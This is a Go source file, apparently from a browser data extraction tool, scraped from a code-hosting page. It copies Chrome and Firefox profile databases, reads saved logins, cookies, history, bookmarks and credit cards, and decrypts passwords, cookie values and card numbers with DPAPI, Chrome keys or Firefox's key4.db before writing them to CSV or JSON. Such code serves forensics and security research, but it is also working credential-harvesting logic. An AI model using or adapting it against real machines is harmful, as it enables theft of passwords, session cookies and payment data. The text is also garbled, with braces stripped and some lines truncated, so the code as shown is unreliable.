You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

850 lines
19 KiB

package data
import (
_ ""
type Item interface {
// ChromeParse parse chrome items, Password and Cookie need secret key
ChromeParse(key []byte) error
// FirefoxParse parse firefox items
FirefoxParse() error
// OutPut file name and format type
OutPut(format, browser, dir string) error
// CopyDB is copy item db file to current dir
CopyDB() error
// Release is delete item db file
Release() error
const (
ChromeCreditFile = "Web Data"
ChromePasswordFile = "Login Data"
ChromeHistoryFile = "History"
ChromeCookieFile = "Cookies"
ChromeBookmarkFile = "Bookmarks"
FirefoxCookieFile = "cookies.sqlite"
FirefoxKey4File = "key4.db"
FirefoxLoginFile = "logins.json"
FirefoxDataFile = "places.sqlite"
var (
queryChromiumCredit = `SELECT guid, name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards`
queryChromiumLogin = `SELECT origin_url, username_value, password_value, date_created FROM logins`
queryChromiumHistory = `SELECT url, title, visit_count, last_visit_time FROM urls`
queryChromiumCookie = `SELECT name, encrypted_value, host_key, path, creation_utc, expires_utc, is_secure, is_httponly, has_expires, is_persistent FROM cookies`
queryFirefoxHistory = `SELECT id, url, last_visit_date, title, visit_count FROM moz_places`
queryFirefoxBookMarks = `SELECT id, fk, type, dateAdded, title FROM moz_bookmarks`
queryFirefoxCookie = `SELECT name, value, host, path, creationTime, expiry, isSecure, isHttpOnly FROM moz_cookies`
queryMetaData = `SELECT item1, item2 FROM metaData WHERE id = 'password'`
queryNssPrivate = `SELECT a11, a102 from nssPrivate`
closeJournalMode = `PRAGMA journal_mode=off`
const (
bookmarkID = "id"
bookmarkAdded = "date_added"
bookmarkUrl = "url"
bookmarkName = "name"
bookmarkType = "type"
bookmarkChildren = "children"
type bookmarks struct {
mainPath string
bookmarks []bookmark
func NewBookmarks(main, sub string) Item {
return &bookmarks{mainPath: main}
func (b *bookmarks) ChromeParse(key []byte) error {
bookmarks, err := utils.ReadFile(ChromeBookmarkFile)
if err != nil {
return err
r := gjson.Parse(bookmarks)
if r.Exists() {
roots := r.Get("roots")
roots.ForEach(func(key, value gjson.Result) bool {
getBookmarkChildren(value, b)
return true
return nil
func getBookmarkChildren(value gjson.Result, b *bookmarks) (children gjson.Result) {
nodeType := value.Get(bookmarkType)
bm := bookmark{
ID: value.Get(bookmarkID).Int(),
Name: value.Get(bookmarkName).String(),
URL: value.Get(bookmarkUrl).String(),
DateAdded: utils.TimeEpochFormat(value.Get(bookmarkAdded).Int()),
children = value.Get(bookmarkChildren)
if nodeType.Exists() {
bm.Type = nodeType.String()
b.bookmarks = append(b.bookmarks, bm)
if children.Exists() && children.IsArray() {
for _, v := range children.Array() {
children = getBookmarkChildren(v, b)
return children
func (b *bookmarks) FirefoxParse() error {
var (
err error
keyDB *sql.DB
bookmarkRows *sql.Rows
tempMap map[int64]string
bookmarkUrl string
keyDB, err = sql.Open("sqlite3", FirefoxDataFile)
if err != nil {
return err
defer func() {
if err := keyDB.Close(); err != nil {
_, err = keyDB.Exec(closeJournalMode)
if err != nil {
bookmarkRows, err = keyDB.Query(queryFirefoxBookMarks)
if err != nil {
return err
for bookmarkRows.Next() {
var (
id, fk, bType, dateAdded int64
title string
err = bookmarkRows.Scan(&id, &fk, &bType, &dateAdded, &title)
if err != nil {
if url, ok := tempMap[id]; ok {
bookmarkUrl = url
b.bookmarks = append(b.bookmarks, bookmark{
ID: id,
Name: title,
Type: utils.BookMarkType(bType),
URL: bookmarkUrl,
DateAdded: utils.TimeStampFormat(dateAdded / 1000000),
return nil
func (b *bookmarks) CopyDB() error {
return copyToLocalPath(b.mainPath, filepath.Base(b.mainPath))
func (b *bookmarks) Release() error {
return os.Remove(filepath.Base(b.mainPath))
func (b *bookmarks) OutPut(format, browser, dir string) error {
sort.Slice(b.bookmarks, func(i, j int) bool {
return b.bookmarks[i].ID < b.bookmarks[j].ID
switch format {
case "csv":
err := b.outPutCsv(browser, dir)
return err
case "console":
return nil
err := b.outPutJson(browser, dir)
return err
type cookies struct {
mainPath string
cookies map[string][]cookie
func NewCookies(main, sub string) Item {
return &cookies{mainPath: main}
func (c *cookies) ChromeParse(secretKey []byte) error {
c.cookies = make(map[string][]cookie)
cookieDB, err := sql.Open("sqlite3", ChromeCookieFile)
if err != nil {
return err
defer func() {
if err := cookieDB.Close(); err != nil {
rows, err := cookieDB.Query(queryChromiumCookie)
if err != nil {
return err
defer func() {
if err := rows.Close(); err != nil {
for rows.Next() {
var (
key, host, path string
isSecure, isHTTPOnly, hasExpire, isPersistent int
createDate, expireDate int64
value, encryptValue []byte
err = rows.Scan(&key, &encryptValue, &host, &path, &createDate, &expireDate, &isSecure, &isHTTPOnly, &hasExpire, &isPersistent)
if err != nil {
cookie := cookie{
KeyName: key,
Host: host,
Path: path,
encryptValue: encryptValue,
IsSecure: utils.IntToBool(isSecure),
IsHTTPOnly: utils.IntToBool(isHTTPOnly),
HasExpire: utils.IntToBool(hasExpire),
IsPersistent: utils.IntToBool(isPersistent),
CreateDate: utils.TimeEpochFormat(createDate),
ExpireDate: utils.TimeEpochFormat(expireDate),
// remove 'v10'
if secretKey == nil {
value, err = decrypt.DPApi(encryptValue)
} else {
value, err = decrypt.ChromePass(secretKey, encryptValue)
if err != nil {
cookie.Value = string(value)
c.cookies[host] = append(c.cookies[host], cookie)
return nil
func (c *cookies) FirefoxParse() error {
c.cookies = make(map[string][]cookie)
cookieDB, err := sql.Open("sqlite3", FirefoxCookieFile)
if err != nil {
return err
defer func() {
if err := cookieDB.Close(); err != nil {
rows, err := cookieDB.Query(queryFirefoxCookie)
if err != nil {
return err
defer func() {
if err := rows.Close(); err != nil {
for rows.Next() {
var (
name, value, host, path string
isSecure, isHttpOnly int
creationTime, expiry int64
err = rows.Scan(&name, &value, &host, &path, &creationTime, &expiry, &isSecure, &isHttpOnly)
if err != nil {
c.cookies[host] = append(c.cookies[host], cookie{
KeyName: name,
Host: host,
Path: path,
IsSecure: utils.IntToBool(isSecure),
IsHTTPOnly: utils.IntToBool(isHttpOnly),
CreateDate: utils.TimeStampFormat(creationTime / 1000000),
ExpireDate: utils.TimeStampFormat(expiry),
Value: value,
return nil
func (c *cookies) CopyDB() error {
return copyToLocalPath(c.mainPath, filepath.Base(c.mainPath))
func (c *cookies) Release() error {
return os.Remove(filepath.Base(c.mainPath))
func (c *cookies) OutPut(format, browser, dir string) error {
switch format {
case "csv":
err := c.outPutCsv(browser, dir)
return err
case "console":
return nil
err := c.outPutJson(browser, dir)
return err
type historyData struct {
mainPath string
history []history
func NewHistoryData(main, sub string) Item {
return &historyData{mainPath: main}
func (h *historyData) ChromeParse(key []byte) error {
historyDB, err := sql.Open("sqlite3", ChromeHistoryFile)
if err != nil {
return err
defer func() {
if err := historyDB.Close(); err != nil {
rows, err := historyDB.Query(queryChromiumHistory)
if err != nil {
return err
defer func() {
if err := rows.Close(); err != nil {
for rows.Next() {
var (
url, title string
visitCount int
lastVisitTime int64
err := rows.Scan(&url, &title, &visitCount, &lastVisitTime)
data := history{
Url: url,
Title: title,
VisitCount: visitCount,
LastVisitTime: utils.TimeEpochFormat(lastVisitTime),
if err != nil {
h.history = append(h.history, data)
return nil
func (h *historyData) FirefoxParse() error {
var (
err error
keyDB *sql.DB
historyRows *sql.Rows
tempMap map[int64]string
tempMap = make(map[int64]string)
keyDB, err = sql.Open("sqlite3", FirefoxDataFile)
if err != nil {
return err
_, err = keyDB.Exec(closeJournalMode)
if err != nil {
defer func() {
if err := keyDB.Close(); err != nil {
historyRows, err = keyDB.Query(queryFirefoxHistory)
if err != nil {
return err
defer func() {
if err := historyRows.Close(); err != nil {
for historyRows.Next() {
var (
id, visitDate int64
url, title string
visitCount int
err = historyRows.Scan(&id, &url, &visitDate, &title, &visitCount)
if err != nil {
h.history = append(h.history, history{
Title: title,
Url: url,
VisitCount: visitCount,
LastVisitTime: utils.TimeStampFormat(visitDate / 1000000),
tempMap[id] = url
return nil
func (h *historyData) CopyDB() error {
return copyToLocalPath(h.mainPath, filepath.Base(h.mainPath))
func (h *historyData) Release() error {
return os.Remove(filepath.Base(h.mainPath))
func (h *historyData) OutPut(format, browser, dir string) error {
sort.Slice(h.history, func(i, j int) bool {
return h.history[i].VisitCount > h.history[j].VisitCount
switch format {
case "csv":
err := h.outPutCsv(browser, dir)
return err
case "console":
return nil
err := h.outPutJson(browser, dir)
return err
type passwords struct {
mainPath string
subPath string
logins []loginData
func NewFPasswords(main, sub string) Item {
return &passwords{mainPath: main, subPath: sub}
func NewCPasswords(main, sub string) Item {
return &passwords{mainPath: main}
func (p *passwords) ChromeParse(key []byte) error {
loginDB, err := sql.Open("sqlite3", ChromePasswordFile)
if err != nil {
return err
defer func() {
if err := loginDB.Close(); err != nil {
rows, err := loginDB.Query(queryChromiumLogin)
if err != nil {
return err
defer func() {
if err := rows.Close(); err != nil {
for rows.Next() {
var (
url, username string
pwd, password []byte
create int64
err = rows.Scan(&url, &username, &pwd, &create)
if err != nil {
login := loginData{
UserName: username,
encryptPass: pwd,
LoginUrl: url,
if key == nil {
password, err = decrypt.DPApi(pwd)
} else {
password, err = decrypt.ChromePass(key, pwd)
if err != nil {
log.Debugf("%s have empty password %s", login.LoginUrl, err.Error())
if create > time.Now().Unix() {
login.CreateDate = utils.TimeEpochFormat(create)
} else {
login.CreateDate = utils.TimeStampFormat(create)
login.Password = string(password)
p.logins = append(p.logins, login)
return nil
func (p *passwords) FirefoxParse() error {
globalSalt, metaBytes, nssA11, nssA102, err := getFirefoxDecryptKey()
if err != nil {
return err
keyLin := []byte{248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1}
meta, err := decrypt.DecodeMeta(metaBytes)
if err != nil {
log.Error("decrypt meta data failed", err)
return err
var masterPwd []byte
m, err := decrypt.Meta(globalSalt, masterPwd, meta)
if err != nil {
log.Error("decrypt firefox meta failed", err)
return err
if bytes.Contains(m, []byte("password-check")) {
log.Debug("password-check success")
m := bytes.Compare(nssA102, keyLin)
if m == 0 {
nss, err := decrypt.DecodeNss(nssA11)
if err != nil {
log.Error("decode firefox nssA11 bytes failed", err)
return err
finallyKey, err := decrypt.Nss(globalSalt, masterPwd, nss)
finallyKey = finallyKey[:24]
if err != nil {
log.Error("get firefox finally key failed")
return err
allLogins, err := getFirefoxLoginData()
if err != nil {
return err
for _, v := range allLogins {
userPBE, _ := decrypt.DecodeLogin(v.encryptUser)
pwdPBE, _ := decrypt.DecodeLogin(v.encryptPass)
user, err := decrypt.Des3Decrypt(finallyKey, userPBE.Iv, userPBE.Encrypted)
if err != nil {
pwd, err := decrypt.Des3Decrypt(finallyKey, pwdPBE.Iv, pwdPBE.Encrypted)
if err != nil {
log.Debug("decrypt firefox success")
p.logins = append(p.logins, loginData{
LoginUrl: v.LoginUrl,
UserName: string(decrypt.PKCS5UnPadding(user)),
Password: string(decrypt.PKCS5UnPadding(pwd)),
CreateDate: v.CreateDate,
return nil
func (p *passwords) CopyDB() error {
err := copyToLocalPath(p.mainPath, filepath.Base(p.mainPath))
if err != nil {
if p.subPath != "" {
err = copyToLocalPath(p.subPath, filepath.Base(p.subPath))
return err
func (p *passwords) Release() error {
err := os.Remove(filepath.Base(p.mainPath))
if err != nil {
if p.subPath != "" {
err = os.Remove(filepath.Base(p.subPath))
return err
func (p *passwords) OutPut(format, browser, dir string) error {
switch format {
case "csv":
err := p.outPutCsv(browser, dir)
return err
case "console":
return nil
err := p.outPutJson(browser, dir)
return err
type creditCards struct {
mainPath string
cards map[string][]card
func NewCCards(main string, sub string) Item {
return &creditCards{mainPath: main}
func (c *creditCards) FirefoxParse() error {
return nil // FireFox does not have a credit card saving feature
func (c *creditCards) ChromeParse(secretKey []byte) error { = make(map[string][]card)
creditDB, err := sql.Open("sqlite3", ChromeCreditFile)
if err != nil {
return err
defer func() {
if err := creditDB.Close(); err != nil {
rows, err := creditDB.Query(queryChromiumCredit)
if err != nil {
return err
defer func() {
if err := rows.Close(); err != nil {
for rows.Next() {
var (
name, month, year, guid string
value, encryptValue []byte
err := rows.Scan(&guid, &name, &month, &year, &encryptValue)
if err != nil {
creditCardInfo := card{
GUID: guid,
Name: name,
ExpirationMonth: month,
ExpirationYear: year,
if secretKey == nil {
value, err = decrypt.DPApi(encryptValue)
} else {
value, err = decrypt.ChromePass(secretKey, encryptValue)
if err != nil {
creditCardInfo.CardNumber = string(value)[guid] = append([guid], creditCardInfo)
return nil
func (c *creditCards) CopyDB() error {
return copyToLocalPath(c.mainPath, filepath.Base(c.mainPath))
func (c *creditCards) Release() error {
return os.Remove(filepath.Base(c.mainPath))
func (c *creditCards) OutPut(format, browser, dir string) error {
switch format {
case "csv":
err := c.outPutCsv(browser, dir)
return err
case "console":
return nil
err := c.outPutJson(browser, dir)
return err
// getFirefoxDecryptKey get value from key4.db
func getFirefoxDecryptKey() (item1, item2, a11, a102 []byte, err error) {
var (
keyDB *sql.DB
pwdRows *sql.Rows
nssRows *sql.Rows
keyDB, err = sql.Open("sqlite3", FirefoxKey4File)
if err != nil {
return nil, nil, nil, nil, err
defer func() {
if err := keyDB.Close(); err != nil {
pwdRows, err = keyDB.Query(queryMetaData)
defer func() {
if err := pwdRows.Close(); err != nil {
for pwdRows.Next() {
if err := pwdRows.Scan(&item1, &item2); err != nil {
if err != nil {
nssRows, err = keyDB.Query(queryNssPrivate)
defer func() {
if err := nssRows.Close(); err != nil {
for nssRows.Next() {
if err := nssRows.Scan(&a11, &a102); err != nil {
return item1, item2, a11, a102, nil
// getFirefoxLoginData use to get firefox
func getFirefoxLoginData() (l []loginData, err error) {
s, err := ioutil.ReadFile(FirefoxLoginFile)
if err != nil {
return nil, err
h := gjson.GetBytes(s, "logins")
if h.Exists() {
for _, v := range h.Array() {
var (
m loginData
u []byte
p []byte
m.LoginUrl = v.Get("formSubmitURL").String()
u, err = base64.StdEncoding.DecodeString(v.Get("encryptedUsername").String())
m.encryptUser = u
if err != nil {
p, err = base64.StdEncoding.DecodeString(v.Get("encryptedPassword").String())
m.encryptPass = p
m.CreateDate = utils.TimeStampFormat(v.Get("timeCreated").Int() / 1000)
l = append(l, m)
type (
loginData struct {
UserName string
encryptPass []byte
encryptUser []byte
Password string
LoginUrl string
CreateDate time.Time
bookmark struct {
ID int64
Name string
Type string
URL string
DateAdded time.Time
cookie struct {
Host string
Path string
KeyName string
encryptValue []byte
Value string
IsSecure bool
IsHTTPOnly bool
HasExpire bool
IsPersistent bool
CreateDate time.Time
ExpireDate time.Time
history struct {
Title string
Url string
VisitCount int
LastVisitTime time.Time
card struct {
GUID string
Name string
ExpirationYear string
ExpirationMonth string
CardNumber string
func (p passwords) Len() int {
return len(p.logins)
func (p passwords) Less(i, j int) bool {
return p.logins[i].CreateDate.After(p.logins[j].CreateDate)
func (p passwords) Swap(i, j int) {
p.logins[i], p.logins[j] = p.logins[j], p.logins[i]
func copyToLocalPath(src, dst string) error {
locals, _ := filepath.Glob("*")
for _, v := range locals {
if v == dst {
err := os.Remove(dst)
if err != nil {
return err
sourceFile, err := ioutil.ReadFile(src)
if err != nil {
err = ioutil.WriteFile(dst, sourceFile, 0777)
if err != nil {
return err